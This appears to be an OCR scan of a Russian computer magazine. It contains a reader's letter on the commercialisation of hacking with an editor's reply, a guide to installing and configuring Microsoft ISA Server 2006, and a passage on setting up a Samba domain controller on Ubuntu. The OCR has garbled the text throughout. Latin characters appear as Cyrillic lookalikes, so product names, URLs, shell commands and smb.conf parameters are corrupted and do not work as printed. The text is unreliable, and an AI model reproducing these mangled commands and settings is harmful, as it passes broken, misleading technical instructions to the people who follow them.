Все, ради чего теперь живет большинство пользователей сети, 
которые именуют себя хакерами, все их стремление — это заподлить 
кому-нибудь, неважно, с какой целью, так, просто, ради спортивного 
интереса... 

Может, я в чем-то и не прав, но извиняйте. Информация многое меняет 
в наших жизнях. То, за что мы боролись еще тогда, в период зарож- 
дения культуры, уже не ценится. . . Сейчас миром и сетью правят уже 
другие ценности... 

Та голубая лента, которая развивалась знаменем, сменилась простой 
бумажкой, которую люди называют баксом. 

Р.8. Появится желание — можете отписаться. . . 

Конечно, товарищ Оптик, ты написал очень брутальное письмо, которое 
не каждому дано осилить. Тем не менее, я очень советую читателю это сде- 
лать! Атем временем я кратко резюмирую и постараюсьтебе аргументи- 
ровано ответить. Итак, своим письмомты ставишь следующие проблемы: 

1 ) коммерциализация хака; 

2) хак ради причинения вреда («все, ради чеготеперьживетболь- 
шинство пользователей сети, которые именуютсебя хакерами, все их 
стремление — это заподлить кому-нибудь»); 

3) вселенский отход оттрадиций и заветов предков («то, за что мы 
боролись ещетогда, в период зарождения культуры, уже не ценится»). 
Итак, первое. Причина коммерциализации хака — это простое желание 
простыхлюдей ездить хотя бы на «Инфинити», жить весело и непринуж- 
денно, вступая в половые отношения с блондинками с большой грудью, 
занимаясь в дорогих фитнес-залах и тусуясь на модных вечеринках. 
Действительно, сидеть на мопеде и фрекать файлы из РТІ\І-сетей, нажи- 
раясь«Клинским» на сисопках и поинтовках, стало немодно. Что с этим 
делать? Ничего не поделаешь, времена, моды и тенденции меняются. 
Остается быть либо в струе, либо аутсайдером, либо выше этого. 

Второе. «Взлом» ради причинения вреда? Сейчас?Ачто было в девянос- 
тые?"^! этого не помнишь? Эпидемии злейших деструктивных вирусов, ло- 
гических бомб и вредныхтроянов, которыеты приносил в кабинет информа- 
тики? Не помнишь?Ая напомню! Пароли и е-кошелечки тогда не воровали, 
а вирусы писали либо из любви к искусству, либо чтобы поздравить девушку 
сДР, л ибо для деструкции. Причем последнее происходило крайне нередко. 
Отход оттрадиций? А что есть традиции? Что такое «бесплатная 
информация»? Тебе не хватает ворованных учеб ни ко в в формате ібііо? 
Крякнутых программ? Так какая же бесплатная информация тебе нуж- 
на? Бывает и такая информация, которая сама по себе дороже любых 
денег, за которую иногда даже убивают. Подумай об этом :). □□ 
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СТОРОЖЕВОЙ СЕТИ 

М3 ІЗА Зегѵег 2006: многофункциональный межсетевой экран на базе 
ѴѴіпсІоѵѵз 

Школа самбы 

для АДМИНОВ 



ЗатЪа: инструмент для работы в сетях ѴѴіпсІоѵѵз 

Чудеса селекци- 
онной работы 

Администрирование ѴѴіпсІоѵѵз 2003 из командной строки 

Меняем окна 
на консоль 

Стратегия выбора материнской платы и жестких дисков для сервера 
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СТОРОЖЕВОЙ СЕТИ 



МБ І5А 5ЕРѴЕР 2006: МНОГОФУНКЦИОНАЛЬНЫЙ МЕЖСЕТЕВОЙ ЭКРАН НА БАЗЕ ѴѴШООѴѴБ 



Интернет сегодня — это не только средство обмена сообщениями и информацией, но и источник многих 
проблем, таких как вирусы, черви, сетевые атаки, утечка конфиденциальных данных и т.д. Если своевре- 
менно не взять ситуацию под контроль, эти факторы могут стать причиной серьезных финансовых по- 
терь. Первым барьером на пути любой заразы стоят межсетевые экраны. Если ты используешь сервер под 
управлением ѴѴіпсІоѵѵз, то стоит познакомиться с М3 ІЗА Зегѵег 2006. 



Краткое знакомство 

В декабре 2000 года корпорация МісгозоК 
представила свой новый продукт, получивший 
название Іпіегпеі: Зесигііу апб Ассеіегагіоп (или 
просто ІЗА) 2000 Зегѵег, заменивший Ргоху 
Зегѵег 2.0. Возможности программы были сле- 
дующие: фильтрация на нескольких уровнях, 
поддержка виртуальных частных сетей, Асііѵе 



Оігесіогу и многое другое. Обновленная версия, 
вышедшая в 2004 году, получила большую 
популярность благодаря многим нововведени- 
ям, сделавшим ІЗА более производительным и 
простым в настройке. 

Сегодня мы познакомимся с третьей реин- 
карнацией ІЗА Зегѵег 2006, которая имеет 
еще больше преимуществ по сравнению с 



предшественниками. На первый взгляд они 
могут быть и не заметны, так как пользователь- 
ский интерфейс, сетевая модель и функции 
брандмауэра остались прежними. Основные 
изменения, бросающиеся в глаза, касаются 
безопасной веб-публикации. Хотя под капотом 
— улучшенная защита от червей, управление 
потреблением памяти и ожидающими ЭИЗ- 
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запросами, расширенное делегирование аутен- 
тификации, режим однократной регистрации 
(330 — зіп§1е зі^п-оп), или, в терминологии 
ІЗА Зегѵег, единый вход, одноразовые пароли 
ПАГШЗ (ОТР — Опе-Тітераззѵюгсіз), средства 
ѴРИ типа «сеть-сеть» с фильтрацией на уровне 
приложения, НТТР-компрессия и многое 
другое. Администратор получил большие 
возможности по управлению и защите сети. 
Единственное, что убрано, — это служба сор- 
тировщика сообщений ЗМТР (ЗМТР Мезза^е 
Зсгеепег) . На смену ему пришел Аші§еп (лллллѵ. 
тісгозоіі.сот/аШІЕгеп) . который не встроен в 
ІЗА Зегѵег и поставляется отдельно. 

В настоящее время доступны две версии 
продукта: Зіапбагі: и Ешегргізе. Версия Зіапбагі: 
ориентирована на небольшие сети с коли- 
чеством пользователей до 500; межсетевой 
экран можно разворачивать только на одном 
компьютере; политики устанавливаются 
локально и хранятся в реестре; нет поддержки 
балансировки. 

Версия Ешегргізе спроектирована для средних 
и крупных компаний, использующих несколько 
межсетевых экранов, которые могут находить- 
ся в дочерних офисах, расположенных по всему 
миру и обслуживающих огромное количество 
пользователей. Здесь уже реализовано центра- 
лизованное управление; все настройки хранят- 
ся в специальном хранилище (их может быть 
два: основное и дополнительное); осуществлен 
контроль за нагрузкой и кэшированием. 
Сгруппировав компьютеры с установленным 
ІЗА Зегѵег 2006 Ешегргізе в массивы, можно 
централизованно управлять сетевой поли- 
тикой предприятия. При необходимости все 
административные задачи могут выполняться 
с одного компьютера, конфигурация будет 
действительна для всех серверов (они могут 
использовать одну политику доступа) . 

Более подробное сравнение версий можно най- 
ти на ѵлллѵ.тісгозоіі.сот/ізазегѵег/ргобіпіо/ 
зшпбагб-ешегргізе-сотрагізоп.тзрх . Чтобы 
не упрощать задачу, будем устанавливать 



Ешегргізе, о которой в интернете информации 
на порядок меньше. Однако практически все 
сказанное будет актуально и для Зіапбагі. 

Устанавливаем І5А2006 

Прежде чем бросаться в бой, следует проана- 
лизировать: организацию сети, членство в 
домене, наличие другого межсетевого экрана, 
используемые протоколы, сервисы, которые 
должны быть доступны из интернета (ПМ2), 
характер сети (рабочая группа или Асііѵе 
Оігесіогу; поддерживаются оба варианта, 
но есть некоторые особенности) . Чтобы в 
работе ІЗА Зегѵег не возникло проблем, следует 
убедиться в правильной настройке маршрути- 
зации и проверить корректность разрешения 
имен ПИЗ-сервером. 

Для установки понадобится компьютер с про- 
цессором РеШіит III 733 МГц, 512 Мб ОЗУ (или 
выше) иѴѴіпсіоаѵз Зегѵег 2003 ЗР1. Жесткий 
диск должен иметь не менее 150 Мб свободного 
места и плюс место для кэшируемых страниц; 
файловая система должна быть ГѵГГБЗ. ІЗА 
Зегѵег 2006 можно установить и на компью- 
терах с одной сетевой платой. Такой вариант 
выбирают, когда планируется использование 
ІЗА в качестве кэширующего или прокси веб- 
сервера. Всю информацию и ссылку для закач- 
ки можно получить на странице ѵдлдѵ.тісгозой. 
сот/ізазегѵег . 

Запускаем исполняемый файл. Будет предложе- 
но распаковать архив в каталог на диске С. Если 
по каким-либо причинам установка прервется, 
то ее можно запустить повторно, вызвав файл 
ізааШогип.ехе. Итак, выбираем в меню «Уста- 
новить ІЗА 2006», появится мастер установки 
ІЗА Зегѵег 2006. В большинстве окон мастера 
достаточно нажимать на кнопку «Далее» и 
соглашаться со всеми вариантами. Единствен- 
ное окно, где может возникнуть затруднение, 

— «Сценарии установки». Здесь предстоит 
выбрать один из четырех вариантов: 

1 . «Установить службы ІЗА Зегѵег» — инстал- 
лируется только служба ІЗА, которая будет 



использовать внешнее хранилище, установлен- 
ное на другом компьютере. 

2. «Установить сервер хранилищ настроек» 

— устанавливается только сервер хранилищ 
настроек, без межсетевого экрана ІЗА. 

3. «Установить компоненты «Службы ІЗА 
Зегѵег» и «Сервер хранилищ настроек» — са- 
мый полный и самодостаточный вариант, будут 
установлены все компоненты, в том числе и 
указанный в пункте 4. 

4. «Установить диспетчер ІЗА Зегѵег» — инс- 
таллируется только диспетчер, позволяющий 
удаленно управлять настройками. 

Так как наш ІЗА-сервер первый, выбираем 
пункт 3, и на следующем шаге нам снова 
будет предложено указать компоненты для 
установки. Выбираем все и в окне «Параметры 
установки предприятия» отмечаем «Создать 
новую корпоративную конфигурацию ІЗА 
Зегѵег». Пункт «Создать реплику корпоратив- 
ной конфигурации» следует указывать только в 
том случае, когда уже есть готовый ІЗА-сервер и 
необходимо скопировать имеющиеся настрой- 
ки на новый сервер настроек. 

После ввода учетной записи, под которой мы бу- 
дем администрировать сервер хранения настро- 
ек (пользователь должен быть создан в системе 
и входить в группу администраторов домена) , 
переходим к этапу определения диапазона 
внутренних адресов. Нажимаем «Добавить», и 
в появившемся окне нам предложат несколько 
вариантов. Выбрав «Добавить плату», просто 
указываем сетевую карту или в списке «Доба- 
вить частный» выбираем диапазон адресов, при- 
надлежащих к частной сети. Ввести значение 
вручную можно в «Добавить диапазон». 

После всех настроек следует обязательно 
проверить результирующую информацию. При 
неправильной маршрутизации мастер может 
ошибиться. На следующем шаге разрешаем 
или запрещаем подключение клиентов по 
незашифрованному каналу. Далее выводится 
предупреждение об остановке или перезапуске 
некоторых служб. 
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> Выбор сценария установки 



> Выбор компонентов І5А5егѵег 



Настройки сети 

Администрирование МісгозоЙ: ІЗА Зегѵег 2006 
производится посредством диспетчера ІЗА 
Зегѵег, вызываемого через «Пуск -> Програм- 
мы -> МісгозоЙ: ІЗА Зегѵег -Э Управление ІЗА 
Зегѵег». Диспетчер ІЗА Зегѵег представляет 
собой консоль оснастки в консоли управления 
(ММС), которая состоит из трех основных об- 
ластей: дерево консоли (дерево ММС), область 
сведений (или область результатов) и панель 
задач (или область действий) . 

Как уже говорилось ранее, в версии Епіегргізе 
используются внешние хранилища. Если 
хранилище установлено на удаленной системе, 
к нему сначала необходимо подключиться, 
выбрав в дереве консоли диспетчера «Місгозоіт 
ІгЦегпеі Зесигііу апб Ассеіегагіоп Зегѵег 2006». 
После этого на вкладке «Задачи» справа нажми 
кнопку «Установить соединение с сервером 
хранилища настроек». Появится мастер 
подключения — просто следуй его указаниям. 
Во время установки параметры можно указать 
только в общем виде, и некоторые из них 
требуют уточнения. Выбираем «Массивы -> 
Конфигурация». Тут несколько пунктов, стоит 
заглянуть во все. Сейчас нас интересует пункт 
«Сети». Сначала следует уточнить топологию. 
Если установленная по умолчанию не соответс- 
твует действительности, переходим во вкладку 
«Шаблоны» и выбираем наиболее подходящий 
вариант. Запускается мастер шаблонов сети, 
далее следуем его указаниям. Для подстрахов- 
ки можно сохранить предыдущие настройки. 
Все известные сети будут доступны во вкладке 
«Сеть», при подключении новой карты или при 
создании нового маршрута следует добавить 
новую сеть в ІЗА. Для этого нажимаем «Создать 
новую сеть» во вкладке «Задачи». Мастер созда- 
ния сетевых правил, вызываемый по нажатию 
на кнопку «Создать сетевое правило», поможет 
определить отношения между сущностями 
сети (маршрут или преобразование сетевых 
адресов) . Перейдя во вкладку «Наборы сетей», 
можно создать предустановленные наборы, 
где будут сгруппированы системы или сети с 
определенными параметрами. Это позволит 



затем включать их в правила фильтрации. И, 
наконец, правила веб-цепочки определяют, бу- 
дут ли маршрутизироваться запросы веб-содер- 
жимого в другую точку назначения, например 
на вышестоящий ІЗА-сервер. 

Создаем правила доступа 

После установки все соединения в ІЗА 2006 
запрещены, разрешены только системные 
политики, разрешающие выборочный трафик с 
ІЗА и на него. Просмотреть их можно так: «Вид 
-> Отображать правила системной политики». 
Политики, применяемые по умолчанию (они 
всегда будут находиться в конце списка), изме- 
нить нельзя, и чтобы получить доступ к ресур- 
сам интернета, пользователям внутренней сети 
необходимо создать разрешающие правила. 
Настройки правил доступа производятся во 
вкладках «Политики предприятия» (только для 
ЕгЦегргізе) и «Политика межсетевого экрана» 
и включают список элементов правила: 
определение протокола, пользователей, типов 
содержимого, расписания и сетевые объекты. 
Применяются они в таком порядке: системные 
политики, политики предприятия, политики 
межсетевого экрана, политики предприятия. 
Политики предприятия, применяемые до и пос- 
ле политик межсетевого экрана, отличаются. 
Созданные политики можно перемещать вверх 
и вниз с помощью меню. 

Работа с этими вкладками в общем схожа, 
поэтому, чтобы приблизить описание к версии 
Зіапбагі:, будем использовать политики межсе- 
тевого экрана. Многие операции производятся 
с помощью контекстного меню или панели «За- 
дачи», расположенной в окне справа. Процесс 
настроек упрощен наличием мастеров. Так, для 
создания новой политики межсетевого экрана 
выбираем «Массивы -> Политика межсетево- 
го экрана» и в контекстном меню указываем 
«Создать -> Правило доступа». В окне мастера 
последовательно вводим название политики, 
действие («Разрешить»/«3апретить»), протоко- 
лы, к которым будет применена политика (про- 
токол, исходящий/входящий трафик), порты, 
источник (сеть, подсеть, группа компьютеров 



или отдельная машина), направление, пользо- 
вателей. После создания всех политик необхо- 
димо нажать кнопку «Применить», чтобы они 
вступили в силу. 

Не следует упрощать себе работу, открывая 
доступ сразу по всем протоколам и направле- 
ниям. В этом случае применение ІЗА теряет 
всякий смысл: пользователи будут бесконт- 
рольно юзать все сервисы интернета, а хакеры 
и вирусы — хозяйничать в сети. Надо открыть 
доступ только к тем службам, которые действи- 
тельно необходимы. Как правило, это НТТР, 
НТТРЗ, ЗМТР, РОРЗ и ІМАР (и их защищенные 
варианты), РТР, ЗЗН, ПМЗ и ІС(^. Все остальное 
будет отрезано последним запрещающим 
правилом. Воспользовавшись пунктами меню 
«Задачи», созданное правило можно изменить, 
удалить и временно отключить, а из контекс- 
тного меню — копировать. 

В окне, которое открывается при редакти- 
ровании политики, находится несколько 
вкладок, позволяющих изменить параметры, 
установленные с помощью мастера. Кроме 
этого, появляется вкладка «Расписание», где 
можно указать дни недели и время, когда 
правило будет активно. Вторая вкладка «Типы 
содержимого» позволяет уточнить, к какому 
типу информации относится это правило. По 
умолчанию установлены «Все типы содержи- 
мого», для указания конкретной группы или 
групп переключи правило в «Выбранные типы 
содержимого» и установи флажки. При задании 
параметра «Выбранные типы содержимого» 
правило применяется только к НТТР-трафику. 
Используя эту вкладку, можно создать правило, 
в котором указать запрет загрузки видео, 
аудио, файлов приложений и прочих, загру- 
жающих канал и не совпадающих с политикой 
безопасности компании. 

В контекстном меню доступны еще два пункта: 
«Настроить НТТР» и «Настроить РТР». В них 
можно более тонко задать работу этих протоко- 
лов: максимальный размер заголовков, длину 
полезных данных, защиту ІШЬ, блокировку 
исполняемых файлов или файлов с указанными 
расширениями и прочие параметры. 
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Публикация ресурсов 

Для разрешения доступа к внутренним 
ресурсам извне их необходимо опубликовать 
в ІЗА. Публикуются веб-серверы или веб-фер- 
мы, сайты ЗЬагеРоіпі:, веб-клиенты ЕхсЬап§е, 
почтовые серверы; есть отдельный мастер для 
публикации не веб-ресурсов. 

Мы для примера опубликуем веб-ресурс. 
Определяем, что именно требуется опублико- 
вать. Затем выбираем «Политика межсетевого 
экрана» и на вкладке «Задачи» щелкаем «Опуб- 
ликовать веб-узлы». 

Появляется мастер создания веб-публи- 
кации, в котором сначала указываем имя 
правила и действие. В следующем окне нам 
предлагают определиться с типом публи- 
кации. Это может быть один веб-узел или 
сервер балансировки нагрузки, ферма 
веб-узлов или публикация нескольких узлов. 
В последнем случае новое правило будет 
создано для каждого узла. В следующем окне 
указываем тип подключения ІЗА-сервера к 
опубликованному ресурсу. В случае выбора 
протокола ЗЗБ на каждом сервере необходи- 
мо установить ЗЗЬ-сертификат. Далее вводим 
внутреннее имя веб-узла и в следующем поле 
опционально указываем каталог, к которому 
будет применено правило. Таким образом, 
можно разрешить доступ из внешней сети к 
строго указанным ресурсам, а пользователи 
внутренней сети будут подключаться к веб- 
серверу без ограничений. 

Далее следует страница «Параметры внешне- 
го имени», на которой определяется, какие 
домены или ІР-адреса должны применять поль- 
зователи для соединения с опубликованным 
ресурсом с помощью правила публикации. 

Не стоит упрощать задачу, указывая «Любое 
доменное имя», поскольку в этом случае все 
обращения на опубликованный порт будут пе- 
ресылаться на узел, который теперь становится 



уязвим для некоторых атак. Следует выбрать 
«Доменное имя» и указать его в поле «Внешнее 
имя», опционально вводится и путь. В окне 
«Выбрать веб-прослушиватель» определяет- 
ся прослушиватель, который будет ожидать 
подключения на указанном порту и проверять 
подлинность входящих веб-запросов. Нажима- 
ем кнопку «Создать» и следуем указаниям еще 
одного мастера, в котором опять же выясняет- 
ся необходимость использования ЗЗЬ, сетей, 
для которых будут прослушиваться входящие 
запросы, сжатия содержимого. В «Параметры 
проверки подлинности» выбирается способ 
аутентификации при доступе к серверу. Пред- 
лагается несколько вариантов: от отсутствия 
проверки как таковой до проверок средства- 
ми Асгіѵе Эігесіогу, КАЭШЗ, в том числе и с 
применением одноразовых паролей. При 
указании варианта «Проверка подлинности на 
основе НТМЬ-форм» будет доступна возмож- 
ность единого входа, когда пользователь при 
доступе к ресурсам регистрируется только 
один раз. Если сервер публичный, выбираем 
«Без проверки подлинности» и возвращаемся 
к мастеру публикации, в котором отмечаем 
созданный прослушиватель. После проверки 
учетных данных ІЗА Зегѵег 2006 делегирует 
проверку подлинности опубликованным сер- 
верам несколькими способами. В следующем 
окне указываем, будет ли разрешено сквозное 
делегирование. Наконец, определяем самих 
пользователей. Для публичного доступа 
оставляем значение, предлагаемое по умол- 
чанию, — «Все пользователи». Итак, ресурс 
опубликован. 

В его свойствах можно задать расписание. 
Кроме того, доступен веб-фильтр преобразо- 
вания ссылок, позволяющий создать словарь 
определений внутренних имен компьютеров 
и сопоставить их с публичными именами, то 
есть заменять одни слова в запросе другими. Во 



вкладке «Использование моста» можно указать 
номера портов, на которые ІЗА будет перена- 
правлять запросы. 

Постскриптум 

Это далеко не все возможности ІЗА Зегѵег 
2006. Мы не рассмотрели вопросы работы с 
ѴРИ, создание и использование сертификатов, 
кэширование и многое другое. Как видишь, 
это довольно мощный продукт, позволяющий 
надежно защитить любую сеть. ИИ 



Г ^ 

ФИЛЬТРЫ ПРИЛОЖЕНИЙ В ІЗА ЗЕКѴЕК 2006 
Присутствует еще один момент, о котором 
нельзя не упомянуть. Кроме правил доступа, 
в ІЗА Зегѵег 2006 используются фильтры 
приложений, которые обеспечивают допол- 
нительный уровень защиты и выполняют 
задания, специфические для конкретных 
протоколов или систем (проверка подлин- 
ности и проверка на вирусы) . Встроенные 
фильтры приложений можно настраивать и 
применять к правилам политики межсе- 
тевого экрана (вкладка «Конфигурация -> 
Надстройки»). 

Расширяемая архитектура сервера позволя- 
ет использовать фильтры, созданные сторон- 
ними производителями: 

• большинство антивирусных компаний 
выпускает фильтры приложений для ІЗА 

• существуют фильтры веб-содержимого 
(например, ѵуулу.соііесгіѵезойѵѵаге.сот) ; 

• программа ІтегпеіАссезз Мопііог 
(АЛАЛАѵ.ішегпеіассеззтопцог.сот/гиз) позво- 
ляет вести учет трафика и контролировать 
эффективность использования интернет- 
канала организации (аналогичную функцию 
выполняет Ргохуіпзресіог Гог ІЗА Зегѵег, 
АлдлАѵ.асіѵзоЙ.ги/ги) . 

^ Л 
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Администрирование сравнительно небольшой сети, настроенной как рабочая группа, может замотать 
даже самого трудолюбивого администратора. Постоянно возникающие проблемы с доступом, пропав- 
шими файлами и сетевыми ресурсами, бесконтрольность и некомпетентность пользователей, способ- 
ные обесценить любую систему безопасности, и прочие хлопоты. Выход из такой ситуации только один 
— взять все под свой контроль, установив контроллер домена. Решить эту задачу с минимальными финан- 
совыми вложениями можно, используя Ьіпііх с пакетом ЗатЬа. 



Установка БатЬа 

Пакет ЗатЬа Гілплпл/.затЬа.огу) позволяет *піх- 
системам имитировать работу ѴѴіпсіоѵуз-сер- 
вера, обеспечивая клиентам доступ к ресурсам 
или принтерам по протоколам ЗМВ/СІРЗ. 
Сервер на базе ЗатЬа может работать индиви- 
дуально или входить в домен ѴѴіпсіоѵуб. Также 
ЗатЬа может выступать в роли первичного или 
резервного контроллера домена. 

Разработка ЗатЬа ведется с 1992 года. Акту- 
альной на момент написания статьи была 
стабильная версия 3.0.24. Кроме того, уже 
доступен для тестирования следующий релиз 
— 4.0.0-ТР4 (ТесЬпоІо^уРгеѵіеѵу). Эта версия 
более трех лет развивается параллельно с 
основной. В ней полностью переписан код, ос- 
новной упор сделан на полную совместимость 
с продуктами МісгозоН и реализацию работы в 
качестве контроллера домена Асйѵе ЭігесЮгу. 
Вариантов использования ЗатЬа в качестве 
РОС очень много, мы рассмотрим лишь один из 
них — авторизацию пользователей средствами 
Ілпих без ІЮАР. 

Для установки контроллера домена был 
выбран дистрибутив ІіЬипШ 6.06 ЬТЗ. В 
ЭеЬіап, АЬТІлпих и других дистрибутивах, 



использующих арц процесс установки анало- 
гичен. Инсталляция ЗатЬа в других дистрибу- 
тивах отличается только командами установки 
пакетов. Настройка же везде одинакова. 

$ зисіо арС-деС іпзСаІІ затЬа 

Все, серверный пакет ЗатЬа установлен. 

Для инсталляции пакета с документацией 
можно добавить затЬа-Дос. Если потребуется 
еще и клиент, то добавляем пакет зтЬсИепи. 
Единственное «но»: в репозитарии на момент 
написания статьи была версия 3.0.22, но, 
вероятно, кто-то захочет использовать послед- 
нюю доступную. Для того чтобы не возиться с 
зависимостями, вводим: 

$ зисіо арС-деС Ьиіісі-сіер зашЬа- 
согшшоп 

Затем распаковываем архив, заходим внутрь 
каталога и конфигурируем: 

$ Саг Х 2 ѴІ зашЬа-3 .0.24. Саг . дг 
$ ссі зашЬа-3 .0.24 
$ . /аиСодеп. зЪ. 



$ ./сопСідиге --ргеСіх=/изг -- 
ш-СЬ-асІз --епаЫе-сирз 

То есть устанавливаем в каталог /изг, включаем 
поддержку Асгіѵе ЭігесЮгу и подсистемы печа- 
ти. Остальное будет добавлено автоматически. 
Затем следуют стандартные «таке; зибо таке 
іпзіаіі». Вот, собственно, и все премудрости. 

Конфигурационный файл БатЬа 

Конфигурационный файл сервера (и частично 
клиента) — традиционный для *піх-систем: 
для того чтобы задействовать большинство 
параметров, достаточно раскомментировать 
или подправить соответствующую строчку. 
Файл /ет/затЬа/зтЬ.соп! не исключение. Он 
состоит из именованных разделов, начинаю- 
щихся со строки с именем раздела, заключен- 
ного в квадратные скобки. Внутри каждого 
раздела находится ряд параметров в виде 
«параметр = значение». Файл конфигурации 
содержит четыре специальных раздела: §1оЬа1, 
Ьотез, ргітегз и отдельные ресурсы зЬагез. 

Как следует из названия, секция §1оЬа1 
содержит переменные, которые ЗатЬа будет 
использовать для определения доступа ко всем 
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ресурсам. Значения некоторых переменных 
можно переопределить в секциях отдельных ре- 
сурсов. Параметров очень много, остановлюсь 
только на самых интересных. 

Итак, открываем зтЪ.сопГ в любимом тексто- 
вом редакторе и вносим изменения: 

# VI /ЕТС/5АМВА/5МВ.С0МР 

[дІоЬаІ] 

# Название рабочей группы в сети 
Мпскжз 

тлгогкдгоир = ШККСКОІІР 

# Имя сервера в сети 
пебЫоз паше = зегѵег. сот 

# Комментарий, который виден в окне 
свойств просмотра сети 

зегѵег збгіпд = ЗашЬа Зегѵег %ѵ 

# Значения зесигібу могут быть следу- 
ющие: изег — на уровне пользователя; 
зЬаге — на уровне ресурсов ; зегѵег 
можно использовать при хранении базы 
паролей на другом ЗМВ-сервере. Если 
сервер является членом домена, ис- 
пользуется значение ботаіп. В нашем 
случае тип домена — Асбіѵе Бігесбогу : 

зесигібу = абз 

# Этот параметр позволяет указать, 
кто и где будет хранить пароли; 
возможно использование нескольких 
систем (при этом они указываются 
через пробел) . Через «:» указывает- 
ся место хранения, если оно отлично 
от используемого по умолчанию. Так, 
зтЬраззмб хранит пароли в файле 
/ебс/зашЬа/зшЬраззмб, поэтому его 
можно опустить. Кроме того, воз- 
можны параметры: ббЬзат, Ібарзат, 
пізріиззаш, хшізаш и шузді . 

##аибЬ тебЬобз = ѵ\/іпЬіпб 
раззбЬ Ьаскепб = зтЬраззмб: /ебс/ 
зашЬа /зшЬраззілб 



# Разрешаем доступ к ЗашЬа только с 
определенных адресов 

Ьозбз аііоот = 192.168.1.0/24 
127.0.0.0/8 

іпбегбасез = ебЬО , Іо 
Ыпб іпбегбасез опіу = уез 

# Чтобы сделать ЗашЬа РБС, обязатель- 
но включаем следующие параметры: 
Іосаі тазбег = уез 

оз Іеѵеі = 65 
ботаіп тазбег = уез 
ргебеггеб тазбег = уез 
ботаіп Іодопз = уез 

# Командный файл, который будет 
выполнен при успешной регистрации 
пользователя 

Іодоп зсгірб = Іодіп.Ьаб 
Іодоп рабЬ = 

# Включаем ЖЫЗ 
ѵ\/іпз зиррогб = уез 

паше гезоіѵе огбег = ѵ\/іпз ІтЬозбз 
Ьозб Ьсазб 

бпз ргоху = по 

# Разрешаем ЗашЬа быть біше-сервером 
для ЭДіпскжз -клиентов 

біше зегѵег = уез 

# Указываем требуемую кодировку 
ипіх сЬагзеб = ибб8 

боз сЬагзеб = ср1251 
бізріау сЬагзеб = ср1251 

# Повышаем уровень безопасности 
епсгурб раззтлгогбз = бгие 

пиіі раззѵгогбз = по 
Ыбе ипгеабаЫе = уез 
Ыбе боб бііез = уез 
шар бо диезб = Ваб бзег 
іпѵаііб изегз = гооб диезб абшіп @ 
ѵ/ЬееІ 

# Журнальные записи 

Іод бііе = /ѵаг/1од/затЬа/1од . %т 



тах Іод зізе = 1000 
зузіод опіу = по 
зузіод = 0 

рапіс асбіоп = /изг/зЬаге/затЬа/ 
рапіс-асбіоп %б 

# В этой секции описывается, где 
взять профиль по умолчанию для новых 
пользователей и где искать командный 
файл 

[пебіодоп] 

рабЬ = /Ьоше/зашЬа/пебІодоп 
геаб опіу = уез 
ЬготлзеаЫе = по 
диезб ок = по 

Сетевые ресурсы и принтеры 

Создаем ресурс, в котором будут находиться 
документы: 

[босз] 

# Комментарий, который виден в окне 
свойств сети 

сошшепб = Босишепбабіоп 
рабЬ = /Ьоше/зашЬа/босз 
аѵаіІаЫе = уез 

# Определяет , выводить ли ресурс в 
списке просмотра 

Ьгоѵ\/зеаЫе = уез 

# Разрешаем запись 
ѵчгібаЫе = уез 

# Права доступа для вновь созданных 
файлов 

сгеабе шобе = 0750 

# Права доступа для вновь созданных 
каталогов 

бігесбогу шобе = 077 5 

При желании можно расшарить и 
СПД)ѴЛ-привод: 

[сбгош] 

сошшепб = БѴБ-КОМ 
ѵчгібаЫе = по 
Іоскіпд = по 
рабЬ = /шебіа/сбгош 
риЫіс = уез 
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ргеехес = /Ьіп/тоипЕ /тесііа/ссігот 
розЕехес = /Ьіп/итоипР /тесііа/ссігот 

И в /еісДзіаЪ: 

/сіеѵ/зссіО /тесііа/ссігот ізо9660 
сіеіаиІРз,поаи1:о,го,изег О О 

С помощью ЗатЬа можно организовать воз- 
можность сетевой печати. Для этого в секции 
§1оЪа1 необходимо дописать следующие строки: 

Іоасі ргіпРегз = уез 

# Описание принтеров 
ргіпРсар пате = сирз 
сіізаЫе зрооізз = Уез 

зЬоіл/ асісі ргіпРег чл/ізагсі = N 0 

# Подсистема печати 
ргіпРіпд = сирз 

Далее каждый принтер описывается аналогич- 
но дисковому ресурсу с одним исключением : 
вводится параметр «ргіпіаЫе = уез». Например: 

[ргіпРегз] 

# Указывает на каталог, куда поме- 
щаются задания на печать 

раЕЬ = /Стр 
Ьгочл/зеаЫе = уез 
ргіпСаЫе = уез 
геасі опіу = уез 

После создания конфигурационного файла 
зтЬ.сопі необходимо протестировать его с 
помощью утилиты іезірагт. При тестиро- 
вании будут выведены все установки, даже 
те, что по умолчанию, поэтому внимательно 
просмотри результат. Стоит помнить, что 
с помощью іезірагт можно обнаружить 
синтаксические ошибки, а не логические. По- 
этому нет никакой гарантии, что описанные 
в файле сервисы будут работать корректно. 

Но если программа не ругается, можно наде- 
яться, что при запуске файл будет загружен 
без проблем. У меня были выданы следующие 
ошибки: 

ЕШЮК: рісі сІігесСогу /ѵаг/гип/ 
затЬа сіоез пор ехізС 

ИАШШС: раззсІЪ ехрапсі ехрІісіС = 
уез із сіергесаСесі 

В первом случае создаем каталог зибо ткбіг 
/ѵаг/гип/затЬа, а заодно и остальные катало- 
ги, описанные в зтЬ.сопі: 



$ зисіо тксііг -р /Ьоте/затЬа/ 
{пеСІодоп, сіосз} 

Чтобы убрать предупреждение, добавляем в 
секцию §1оЪа1 параметр: 

раззсіЬ ехрапсі ехрІісіЕ = по 

Обрати внимание на запись «Зегѵег гоіе: 
КОЬЕДЮМАШ_РПС». Она означает, что ЗатЬа 
настроен на работу как РОС, чего, собственно, 
мы и хотели добиться. 

Теперь создаем файл Іо^іп.Ъаі:, который будет 
выполнен при регистрации пользователей. В 
нашем примере в нем содержатся команды для 
автоматического монтирования сетевого диска 
и синхронизации часов: 

$51Ю0 МСЕйІТ /Н0МЕ/5АМВА/ 

мЕті_оеом/і_оеш.вАт 

пеЕ ііте \\дгіпсіег . сот /зеР /уез 
пеР изе Ь: \ Хдгіпсіег . сот\сіосз 

Не забудь, что этот файл должен быть в стиле 
ѴѴіпйоѵрз, то есть с ВК/ПС в конце строки. 

Лучше его подготовить в блокноте, а затем 
скопировать в Ілпих-систему. 

Если установка ЗатЬа производилась из 
пакетов, то стартовые скрипты уже готовы. 
Запускаем сервер: 

$ зисіо /еРс/іпіР . сі/затЬа зРагР 

Команда «рз ах | §гер тЬб» должна показать 
наличие процессов, а вывод «пезіаі-а» — нали- 
чие открытых портов (135, 139), характерных 
для ѴѴіпбоѵрз-систем. С помощью следующей 
команды получаем список ресурсов сервера: 

$ зтЬсІіепР -Ь ІосаІЬозР -Ь 
изег %раз зѵгогсі 

Если после всех перечисленных действий так и не 
удалось организовать доступ к ресурсам ЗатЬа, 
